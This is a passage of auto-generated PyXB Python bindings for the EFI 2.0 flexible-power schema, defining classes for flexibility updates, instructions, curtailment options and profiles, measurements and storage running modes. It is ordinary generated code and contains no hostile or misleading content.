    # Element {http://www.flexiblepower.org/efi-2}currency uses Python identifier currency
    __currency = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'currency'), 'currency', '__httpwww_flexiblepower_orgefi_2_FlexibilityRegistration_httpwww_flexiblepower_orgefi_2currency', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5), )
    currency = property(__currency.value, __currency.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
        __instructionProcessingDelay.name() : __instructionProcessingDelay,
        __deviceDescription.name() : __deviceDescription,
        __currency.name() : __currency
    })
    # No attributes beyond those inherited from EfiMessage.
    _AttributeMap.update({
    })
# Register the binding with the module registry and the namespace.
_module_typeBindings.FlexibilityRegistration = FlexibilityRegistration
Namespace.addCategoryObject('typeBinding', 'FlexibilityRegistration', FlexibilityRegistration)
# Complex type {http://www.flexiblepower.org/efi-2}FlexibilityUpdate with content type ELEMENT_ONLY
# PyXB-generated binding: abstract base for flexibility-update messages,
# extending EfiMessage with an update id and a validity start time.
# NOTE(review): auto-generated — regenerate from the XSD, don't hand-edit.
class FlexibilityUpdate (EfiMessage):
    """Complex type {http://www.flexiblepower.org/efi-2}FlexibilityUpdate with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    # Abstract: instances of this exact type cannot appear in documents.
    _Abstract = True
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'FlexibilityUpdate')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 53, 1)
    # Copy base maps so updates below don't mutate EfiMessage's own maps.
    _ElementMap = EfiMessage._ElementMap.copy()
    _AttributeMap = EfiMessage._AttributeMap.copy()
    # Base type is EfiMessage
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element {http://www.flexiblepower.org/efi-2}flexibilityUpdateId uses Python identifier flexibilityUpdateId
    __flexibilityUpdateId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId'), 'flexibilityUpdateId', '__httpwww_flexiblepower_orgefi_2_FlexibilityUpdate_httpwww_flexiblepower_orgefi_2flexibilityUpdateId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5), )
    flexibilityUpdateId = property(__flexibilityUpdateId.value, __flexibilityUpdateId.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}validFrom uses Python identifier validFrom
    __validFrom = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'validFrom'), 'validFrom', '__httpwww_flexiblepower_orgefi_2_FlexibilityUpdate_httpwww_flexiblepower_orgefi_2validFrom', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5), )
    validFrom = property(__validFrom.value, __validFrom.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
        __flexibilityUpdateId.name() : __flexibilityUpdateId,
        __validFrom.name() : __validFrom
    })
    # No attributes beyond those inherited from EfiMessage.
    _AttributeMap.update({
    })
# Register the binding with the module registry and the namespace.
_module_typeBindings.FlexibilityUpdate = FlexibilityUpdate
Namespace.addCategoryObject('typeBinding', 'FlexibilityUpdate', FlexibilityUpdate)
# Complex type {http://www.flexiblepower.org/efi-2}Instruction with content type ELEMENT_ONLY
# PyXB-generated binding: abstract base for instruction messages, extending
# EfiMessage with an instruction id, the flexibility-update id it refers to,
# and an emergency flag. NOTE(review): auto-generated — don't hand-edit.
class Instruction (EfiMessage):
    """Complex type {http://www.flexiblepower.org/efi-2}Instruction with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    # Abstract: instances of this exact type cannot appear in documents.
    _Abstract = True
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Instruction')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 63, 1)
    # Copy base maps so updates below don't mutate EfiMessage's own maps.
    _ElementMap = EfiMessage._ElementMap.copy()
    _AttributeMap = EfiMessage._AttributeMap.copy()
    # Base type is EfiMessage
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element {http://www.flexiblepower.org/efi-2}instructionId uses Python identifier instructionId
    __instructionId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'instructionId'), 'instructionId', '__httpwww_flexiblepower_orgefi_2_Instruction_httpwww_flexiblepower_orgefi_2instructionId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 67, 5), )
    instructionId = property(__instructionId.value, __instructionId.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}flexibilityUpdateId uses Python identifier flexibilityUpdateId
    __flexibilityUpdateId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId'), 'flexibilityUpdateId', '__httpwww_flexiblepower_orgefi_2_Instruction_httpwww_flexiblepower_orgefi_2flexibilityUpdateId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 68, 5), )
    flexibilityUpdateId = property(__flexibilityUpdateId.value, __flexibilityUpdateId.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}isEmergencyInstruction uses Python identifier isEmergencyInstruction
    __isEmergencyInstruction = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'isEmergencyInstruction'), 'isEmergencyInstruction', '__httpwww_flexiblepower_orgefi_2_Instruction_httpwww_flexiblepower_orgefi_2isEmergencyInstruction', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 69, 5), )
    isEmergencyInstruction = property(__isEmergencyInstruction.value, __isEmergencyInstruction.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
        __instructionId.name() : __instructionId,
        __flexibilityUpdateId.name() : __flexibilityUpdateId,
        __isEmergencyInstruction.name() : __isEmergencyInstruction
    })
    # No attributes beyond those inherited from EfiMessage.
    _AttributeMap.update({
    })
# Register the binding with the module registry and the namespace.
_module_typeBindings.Instruction = Instruction
Namespace.addCategoryObject('typeBinding', 'Instruction', Instruction)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_12 (EfiMessage):
    """Complex type [anonymous] with content type ELEMENT_ONLY.

    PyXB-generated binding for the anonymous complex type declared at
    InflexibleControllerEfi20.xsd line 75.  Extends EfiMessage with the
    local elements ``instructionId``, ``status`` and ``debugInformation``.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no qualified XSD name, hence no addCategoryObject call below.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 75, 2)
    # Start from copies of the base type's maps so inherited content
    # (e.g. the header element) is retained alongside local declarations.
    _ElementMap = EfiMessage._ElementMap.copy()
    _AttributeMap = EfiMessage._AttributeMap.copy()
    # Base type is EfiMessage
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element {http://www.flexiblepower.org/efi-2}instructionId uses Python identifier instructionId
    __instructionId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'instructionId'), 'instructionId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_12_httpwww_flexiblepower_orgefi_2instructionId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 79, 6), )
    instructionId = property(__instructionId.value, __instructionId.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}status uses Python identifier status
    __status = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'status'), 'status', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_12_httpwww_flexiblepower_orgefi_2status', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 80, 6), )
    status = property(__status.value, __status.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}debugInformation uses Python identifier debugInformation
    __debugInformation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'debugInformation'), 'debugInformation', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_12_httpwww_flexiblepower_orgefi_2debugInformation', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 81, 6), )
    debugInformation = property(__debugInformation.value, __debugInformation.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Register the locally declared elements with the binding machinery.
    _ElementMap.update({
        __instructionId.name() : __instructionId,
        __status.name() : __status,
        __debugInformation.name() : __debugInformation
    })
    _AttributeMap.update({
    })
# Expose the binding on the module's type-binding registry.
_module_typeBindings.CTD_ANON_12 = CTD_ANON_12
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_13 (EfiMessage):
    """Complex type [anonymous] with content type ELEMENT_ONLY.

    PyXB-generated binding for the anonymous complex type declared at
    InflexibleControllerEfi20.xsd line 97.  Adds no local elements or
    attributes beyond those inherited from EfiMessage.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no qualified XSD name of its own.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 97, 2)
    # Copies of the base maps keep the inherited header element and efiVersion attribute.
    _ElementMap = EfiMessage._ElementMap.copy()
    _AttributeMap = EfiMessage._AttributeMap.copy()
    # Base type is EfiMessage
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Expose the binding on the module's type-binding registry.
_module_typeBindings.CTD_ANON_13 = CTD_ANON_13
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_14 (EfiMessage):
    """Complex type [anonymous] with content type ELEMENT_ONLY.

    PyXB-generated binding for the anonymous complex type declared at
    InflexibleControllerEfi20.xsd line 104.  Extends EfiMessage with the
    local element ``instructionId``.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no qualified XSD name of its own.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 104, 2)
    # Copies of the base maps keep the inherited header element and efiVersion attribute.
    _ElementMap = EfiMessage._ElementMap.copy()
    _AttributeMap = EfiMessage._AttributeMap.copy()
    # Base type is EfiMessage
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element {http://www.flexiblepower.org/efi-2}instructionId uses Python identifier instructionId
    __instructionId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'instructionId'), 'instructionId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_14_httpwww_flexiblepower_orgefi_2instructionId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 108, 6), )
    instructionId = property(__instructionId.value, __instructionId.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Register the locally declared element with the binding machinery.
    _ElementMap.update({
        __instructionId.name() : __instructionId
    })
    _AttributeMap.update({
    })
# Expose the binding on the module's type-binding registry.
_module_typeBindings.CTD_ANON_14 = CTD_ANON_14
# Complex type {http://www.flexiblepower.org/efi-2}ProbabilityAttributesWithDuration with content type EMPTY
class ProbabilityAttributesWithDuration (ProbabilityAttributes):
    """Complex type {http://www.flexiblepower.org/efi-2}ProbabilityAttributesWithDuration with content type EMPTY.

    PyXB-generated binding: extends ProbabilityAttributes with a required
    ``duration`` attribute of type xsd:duration.  Content type is EMPTY, so
    the type carries attributes only.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ProbabilityAttributesWithDuration')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 137, 1)
    # Copies of the base maps keep the inherited probability attributes.
    _ElementMap = ProbabilityAttributes._ElementMap.copy()
    _AttributeMap = ProbabilityAttributes._AttributeMap.copy()
    # Base type is ProbabilityAttributes
    # Attribute the68PPRLower inherited from {http://www.flexiblepower.org/efi-2}ProbabilityAttributes
    # Attribute the95PPRLower inherited from {http://www.flexiblepower.org/efi-2}ProbabilityAttributes
    # Attribute expected inherited from {http://www.flexiblepower.org/efi-2}ProbabilityAttributes
    # Attribute the95PPRUpper inherited from {http://www.flexiblepower.org/efi-2}ProbabilityAttributes
    # Attribute the68PPRUpper inherited from {http://www.flexiblepower.org/efi-2}ProbabilityAttributes
    # Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
    # Required attribute of XSD type duration.
    __duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_ProbabilityAttributesWithDuration_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
    __duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 140, 4)
    __duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 140, 4)
    duration = property(__duration.value, __duration.set, None, None)
    _ElementMap.update({
    })
    # Register the locally declared attribute with the binding machinery.
    _AttributeMap.update({
        __duration.name() : __duration
    })
# Expose the binding and register it under its XSD name.
_module_typeBindings.ProbabilityAttributesWithDuration = ProbabilityAttributesWithDuration
Namespace.addCategoryObject('typeBinding', 'ProbabilityAttributesWithDuration', ProbabilityAttributesWithDuration)
# Complex type {http://www.flexiblepower.org/efi-2}CurtailmentOption with content type ELEMENT_ONLY
class CurtailmentOption (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}CurtailmentOption with content type ELEMENT_ONLY.

    PyXB-generated binding: a repeatable ``curtailmentRange`` element, a
    required ``curtailmentQuantity`` attribute and an optional
    ``minimalCurtailmentDuration`` attribute defaulting to ``PT0S``.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurtailmentOption')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 236, 1)
    # No base binding class other than complexTypeDefinition, so the maps start empty.
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}curtailmentRange uses Python identifier curtailmentRange
    # Fifth positional argument True marks this element as plural (may occur multiple times).
    __curtailmentRange = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'curtailmentRange'), 'curtailmentRange', '__httpwww_flexiblepower_orgefi_2_CurtailmentOption_httpwww_flexiblepower_orgefi_2curtailmentRange', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 238, 3), )
    curtailmentRange = property(__curtailmentRange.value, __curtailmentRange.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}curtailmentQuantity uses Python identifier curtailmentQuantity
    __curtailmentQuantity = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'curtailmentQuantity'), 'curtailmentQuantity', '__httpwww_flexiblepower_orgefi_2_CurtailmentOption_httpwww_flexiblepower_orgefi_2curtailmentQuantity', _module_typeBindings.CurtailmentQuantity, required=True)
    __curtailmentQuantity._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 240, 2)
    __curtailmentQuantity._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 240, 2)
    curtailmentQuantity = property(__curtailmentQuantity.value, __curtailmentQuantity.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}minimalCurtailmentDuration uses Python identifier minimalCurtailmentDuration
    # Optional attribute with XSD default 'PT0S' (zero duration).
    __minimalCurtailmentDuration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'minimalCurtailmentDuration'), 'minimalCurtailmentDuration', '__httpwww_flexiblepower_orgefi_2_CurtailmentOption_httpwww_flexiblepower_orgefi_2minimalCurtailmentDuration', pyxb.binding.datatypes.duration, unicode_default='PT0S')
    __minimalCurtailmentDuration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 241, 2)
    __minimalCurtailmentDuration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 241, 2)
    minimalCurtailmentDuration = property(__minimalCurtailmentDuration.value, __minimalCurtailmentDuration.set, None, None)
    # Register the locally declared element and attributes with the binding machinery.
    _ElementMap.update({
        __curtailmentRange.name() : __curtailmentRange
    })
    _AttributeMap.update({
        __curtailmentQuantity.name() : __curtailmentQuantity,
        __minimalCurtailmentDuration.name() : __minimalCurtailmentDuration
    })
# Expose the binding and register it under its XSD name.
_module_typeBindings.CurtailmentOption = CurtailmentOption
Namespace.addCategoryObject('typeBinding', 'CurtailmentOption', CurtailmentOption)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_15 (EfiMessage):
    """Complex type [anonymous] with content type ELEMENT_ONLY.

    PyXB-generated binding for the anonymous complex type declared at
    InflexibleControllerEfi20.xsd line 253.  Extends EfiMessage with a
    measurement timestamp plus electricity, gas and heat measurement elements.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no qualified XSD name of its own.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 253, 2)
    # Copies of the base maps keep the inherited header element and efiVersion attribute.
    _ElementMap = EfiMessage._ElementMap.copy()
    _AttributeMap = EfiMessage._AttributeMap.copy()
    # Base type is EfiMessage
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element {http://www.flexiblepower.org/efi-2}measurementTimestamp uses Python identifier measurementTimestamp
    __measurementTimestamp = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'measurementTimestamp'), 'measurementTimestamp', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_15_httpwww_flexiblepower_orgefi_2measurementTimestamp', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 257, 6), )
    measurementTimestamp = property(__measurementTimestamp.value, __measurementTimestamp.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}electricityMeasurement uses Python identifier electricityMeasurement
    __electricityMeasurement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricityMeasurement'), 'electricityMeasurement', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_15_httpwww_flexiblepower_orgefi_2electricityMeasurement', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 258, 6), )
    electricityMeasurement = property(__electricityMeasurement.value, __electricityMeasurement.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}gasMeasurement uses Python identifier gasMeasurement
    __gasMeasurement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasMeasurement'), 'gasMeasurement', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_15_httpwww_flexiblepower_orgefi_2gasMeasurement', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 263, 6), )
    gasMeasurement = property(__gasMeasurement.value, __gasMeasurement.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatMeasurement uses Python identifier heatMeasurement
    __heatMeasurement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatMeasurement'), 'heatMeasurement', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_15_httpwww_flexiblepower_orgefi_2heatMeasurement', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 268, 6), )
    heatMeasurement = property(__heatMeasurement.value, __heatMeasurement.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Register the locally declared elements with the binding machinery.
    _ElementMap.update({
        __measurementTimestamp.name() : __measurementTimestamp,
        __electricityMeasurement.name() : __electricityMeasurement,
        __gasMeasurement.name() : __gasMeasurement,
        __heatMeasurement.name() : __heatMeasurement
    })
    _AttributeMap.update({
    })
# Expose the binding on the module's type-binding registry.
_module_typeBindings.CTD_ANON_15 = CTD_ANON_15
# Complex type {http://www.flexiblepower.org/efi-2}CurtailmentProfile with content type ELEMENT_ONLY
class CurtailmentProfile (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}CurtailmentProfile with content type ELEMENT_ONLY.

    PyXB-generated binding: a repeatable ``curtailmentProfileElement``
    element plus the required attributes ``curtailmentQuantity`` and
    ``startTime`` (xsd:dateTime).
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurtailmentProfile')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 329, 1)
    # No base binding class other than complexTypeDefinition, so the maps start empty.
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}curtailmentProfileElement uses Python identifier curtailmentProfileElement
    # Fifth positional argument True marks this element as plural (may occur multiple times).
    __curtailmentProfileElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'curtailmentProfileElement'), 'curtailmentProfileElement', '__httpwww_flexiblepower_orgefi_2_CurtailmentProfile_httpwww_flexiblepower_orgefi_2curtailmentProfileElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 331, 3), )
    curtailmentProfileElement = property(__curtailmentProfileElement.value, __curtailmentProfileElement.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}curtailmentQuantity uses Python identifier curtailmentQuantity
    __curtailmentQuantity = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'curtailmentQuantity'), 'curtailmentQuantity', '__httpwww_flexiblepower_orgefi_2_CurtailmentProfile_httpwww_flexiblepower_orgefi_2curtailmentQuantity', _module_typeBindings.CurtailmentQuantity, required=True)
    __curtailmentQuantity._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 333, 2)
    __curtailmentQuantity._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 333, 2)
    curtailmentQuantity = property(__curtailmentQuantity.value, __curtailmentQuantity.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}startTime uses Python identifier startTime
    __startTime = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'startTime'), 'startTime', '__httpwww_flexiblepower_orgefi_2_CurtailmentProfile_httpwww_flexiblepower_orgefi_2startTime', pyxb.binding.datatypes.dateTime, required=True)
    __startTime._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 334, 2)
    __startTime._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 334, 2)
    startTime = property(__startTime.value, __startTime.set, None, None)
    # Register the locally declared element and attributes with the binding machinery.
    _ElementMap.update({
        __curtailmentProfileElement.name() : __curtailmentProfileElement
    })
    _AttributeMap.update({
        __curtailmentQuantity.name() : __curtailmentQuantity,
        __startTime.name() : __startTime
    })
# Expose the binding and register it under its XSD name.
_module_typeBindings.CurtailmentProfile = CurtailmentProfile
Namespace.addCategoryObject('typeBinding', 'CurtailmentProfile', CurtailmentProfile)
# Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileAlternative with content type ELEMENT_ONLY
class SequentialProfileAlternative (ProfileContainer):
    """Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileAlternative with content type ELEMENT_ONLY.

    PyXB-generated binding: extends ProfileContainer (all profile elements
    inherited) with a required integer ``alternativeNr`` attribute.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SequentialProfileAlternative')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 358, 1)
    # Copies of the base maps keep all inherited profile elements.
    _ElementMap = ProfileContainer._ElementMap.copy()
    _AttributeMap = ProfileContainer._AttributeMap.copy()
    # Base type is ProfileContainer
    # Element electricityProfile ({http://www.flexiblepower.org/efi-2}electricityProfile) inherited from {http://www.flexiblepower.org/efi-2}ProfileContainer
    # Element electricityProbabilityProfile ({http://www.flexiblepower.org/efi-2}electricityProbabilityProfile) inherited from {http://www.flexiblepower.org/efi-2}ProfileContainer
    # Element gasProfile ({http://www.flexiblepower.org/efi-2}gasProfile) inherited from {http://www.flexiblepower.org/efi-2}ProfileContainer
    # Element gasProbabilityProfile ({http://www.flexiblepower.org/efi-2}gasProbabilityProfile) inherited from {http://www.flexiblepower.org/efi-2}ProfileContainer
    # Element heatProfile ({http://www.flexiblepower.org/efi-2}heatProfile) inherited from {http://www.flexiblepower.org/efi-2}ProfileContainer
    # Element heatProbabilityProfile ({http://www.flexiblepower.org/efi-2}heatProbabilityProfile) inherited from {http://www.flexiblepower.org/efi-2}ProfileContainer
    # Attribute {http://www.flexiblepower.org/efi-2}alternativeNr uses Python identifier alternativeNr
    # Required attribute of XSD type int.
    __alternativeNr = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'alternativeNr'), 'alternativeNr', '__httpwww_flexiblepower_orgefi_2_SequentialProfileAlternative_httpwww_flexiblepower_orgefi_2alternativeNr', pyxb.binding.datatypes.int, required=True)
    __alternativeNr._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 361, 4)
    __alternativeNr._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 361, 4)
    alternativeNr = property(__alternativeNr.value, __alternativeNr.set, None, None)
    _ElementMap.update({
    })
    # Register the locally declared attribute with the binding machinery.
    _AttributeMap.update({
        __alternativeNr.name() : __alternativeNr
    })
# Expose the binding and register it under its XSD name.
_module_typeBindings.SequentialProfileAlternative = SequentialProfileAlternative
Namespace.addCategoryObject('typeBinding', 'SequentialProfileAlternative', SequentialProfileAlternative)
# Complex type {http://www.flexiblepower.org/efi-2}StorageDiscreteRunningMode with content type ELEMENT_ONLY
class StorageDiscreteRunningMode (RunningMode):
    """Complex type {http://www.flexiblepower.org/efi-2}StorageDiscreteRunningMode with content type ELEMENT_ONLY.

    PyXB-generated binding: extends RunningMode with a repeatable
    ``discreteRunningModeElement`` element.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageDiscreteRunningMode')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 581, 1)
    # Copies of the base maps keep the inherited id/label attributes.
    _ElementMap = RunningMode._ElementMap.copy()
    _AttributeMap = RunningMode._AttributeMap.copy()
    # Base type is RunningMode
    # Element {http://www.flexiblepower.org/efi-2}discreteRunningModeElement uses Python identifier discreteRunningModeElement
    # Fifth positional argument True marks this element as plural (may occur multiple times).
    __discreteRunningModeElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningModeElement'), 'discreteRunningModeElement', '__httpwww_flexiblepower_orgefi_2_StorageDiscreteRunningMode_httpwww_flexiblepower_orgefi_2discreteRunningModeElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 585, 5), )
